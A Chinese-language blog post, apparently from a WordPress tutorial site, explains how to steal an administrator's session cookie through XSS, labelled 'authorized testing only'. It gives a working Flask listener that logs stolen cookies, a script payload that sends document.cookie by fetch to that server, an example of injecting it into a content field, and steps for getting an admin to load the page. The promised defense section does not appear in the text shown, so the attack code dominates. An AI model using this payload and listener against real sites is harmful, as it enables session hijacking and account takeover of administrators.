WordPress极简博客 WordPress极简博客
  • 新鲜事
  • 战疫情
  • UI素材
    • UI素材
    • 电商/节日
    • PPT
      • 节日庆典
      • 工作汇报
      • 商业计划书
    • word
      • 简历竞聘
      • 合同/公文
  • 创客头条
    • 音乐分享
    • 初创文章
    • 极客头条
    • 生活趣事
    • 生活日记
    • 防骗指南
  • 编程教学
    • API日记
    • Linux安全栏目
      • Linux运维安全汇总
      • DDOS攻击防护
      • XSS攻击防护
      • SQL安全防护
    • Python技术栏目
      • Python基础入门
      • Python基础结构
    • WordPress技术栏目
      • WP主题
      • WordPress技术教程
      • RIPRO主题美化
    • WordPress漏洞发布
    • 技术教程汇总
    • 严选源码
  • 专题
  • 基友
  • 隐私
  • 注册
    登录
立即登录
  • 首页
  • 云优化
  • 新疫情
  • 新鲜事
    • 热文
    • 极客
    • 生活
  • 技术篇
    • WP主题
    • 技术教程
    • Python入门
    • Python基础
  • 专题篇
  • 友链君
首页 Linux安全 XSS攻击防护 如何利用 XSS 拿到管理员 Cookie?(仅限授权测试)

如何利用 XSS 拿到管理员 Cookie?(仅限授权测试)

夏柔 3月 26, 2026
下面我按 「原理 → 合法测试流程 → 示例代码 → 防御方案」​ 给你讲清楚,并确保只适用于你已授权的测试环境。

一、原理先讲清楚(一句话版)

✅ XSS 的本质是:
攻击者让浏览器执行 JS​
✅ Cookie 是浏览器自动携带的
✅ JS 可以读取 document.cookie
✅ 然后发送到攻击者服务器

二、前提条件(缺一不可)

✅ 必须满足的条件

  1. ✅ 存在 存储型 / 反射型 XSS
  2. ✅ Cookie 未设置 HttpOnly
  3. ✅ 你能控制一台接收服务器(如 nc/ Flask / Node)
  4. ✅ 目标用户(管理员)访问了带 XSS 的页面

三、如何检查 Cookie 是否可被窃取?

✅ 在浏览器控制台执行

console.log(document.cookie);
如果能看到类似:
JSESSIONID=abc123;
admin_token=xyz456
✅ 说明可以被 JS 读取
❌ 如果为空或被隐藏 → 说明有 HttpOnly

四、合法测试:模拟“窃取 Cookie”(示例)

1️⃣ 准备一个接收服务器(测试用)

Python 示例(监听 8000)

from flask import Flask, request
app = Flask(__name__)

@app.route("/log")
def log():
    cookie = request.args.get("c")
    print("偷到的 Cookie:", cookie)
    return "ok"

app.run(host="0.0.0.0", port=8000)

2️⃣ 构造 XSS Payload

<script>
fetch('http://127.0.0.1:8000/log?c=' + encodeURIComponent(document.cookie));
</script>

3️⃣ 注入到系统(如 content 字段)

"content": "<script>fetch('http://127.0.0.1:8000/log?c='+encodeURIComponent(document.cookie))</script>"

4️⃣ 用管理员账号访问该页面

  • 登录管理员
  • 打开含 XSS 的页面
  • 查看你的服务器终端
✅ 如果看到 Cookie 打印出来
✅ 说明 XSS 可利用窃取会话

0
J2dcg1.png
猜你喜欢
  • xss攻击入门
  • 挖洞经验 | 从Self XSS到有趣的存储型XSS
  • XSS语义分析的阶段性总结
  • 如何防止XSS攻击?
  • 整理php防注入和XSS攻击通用过滤
  • 了解与防御XSS攻击(超详细!)
  • 防御XSS的七条原则
21 10月, 2020
Python基础语法单词表归类
夏柔
站长
夏山如碧 - 怀柔天下
1722
文章
25
评论
58146K
获赞
版权声明

文章采用创作共用版权 CC BY-NC-ND/2.5/CN 许可协议,与本站观点无关。

如果您认为本文侵犯了您的版权信息,请与我们联系修正或删除。
投诉邮箱wpsite@aliyun.com

栏目推荐
Python基础入门33
WordPress技术教程267
前沿技术情报所22
城市创新——新消费11
最近有哪些不可错过的热文23
程序员的养生之道0
节
春
  • 新鲜事
  • 疫情实况
  • UI素材
  • 技术教程
  • 音乐分享
  • 专题
  • 友情
  • 隐私
  • 云优化
Copyright © 2019-2026 WordPress极简博客. Designed by 夏柔. 辽公网安备21010502000474号 辽ICP备19017037号-2